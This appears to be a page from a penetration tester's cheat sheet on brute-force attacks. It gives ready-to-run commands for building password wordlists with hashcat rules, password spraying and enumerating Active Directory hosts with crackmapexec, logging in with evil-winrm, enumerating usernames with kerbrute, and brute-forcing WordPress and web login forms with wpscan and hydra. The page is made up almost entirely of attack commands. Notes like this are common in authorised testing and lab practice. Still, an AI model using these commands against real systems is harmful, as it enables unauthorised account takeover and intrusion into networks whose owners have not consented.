Brute Force

Generate Wordlist

Password possibilites:

  • username

  • summer, spring, winter

  • password

  • date(jully, april, 2023, etc)

Using Hashcat

hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.lst

Active Directory

Check workstations

crackmapexec smb 192.168.1.0/24
crackmapexec winrm 192.168.1.0/24


# have a user and password?
# go enumerate computers in the domain
crackmapexec smb $IP -u <username> -p <password> --computers

Password spraying

check the password policy

crackmapexec smb $IP --pass-pol

# check this, if there is info like this go ahead for bruteforce.
Account Lockout Threshold: None

prepare for targets.txt, users.txt and passwords.txt

crackmapexec winrm targets.txt -u users.txt -p passwords.txt --continue-on-success -d <domain>

crackmapexec smb $IP -u users.txt -p '<password>'
crackmapexec winrm $IP -u users.txt -p '<password>'
# --> use evil-winrm to login
# example: evil-winrm -u mhope -p 'testpassword' -i $IP

Kerbrute

kerbrute userenum --dc <dc ip> -d <domain> users.txt
kerbrute userenum --dc <dc ip> -d <domain> /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt


# kerbrute with NTLM hash (https://github.com/3gstudent/pyKerbrute)

Wordpress Login

wpscan --url <wordpress url> --wordlist /usr/share/wordlists/rockyou.txt --username <username>

Website Login Brute Force

hydra -l '' -P 3digits.txt -f -v 10.10.171.8 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
PreviousExploitNextFile Upload

Last updated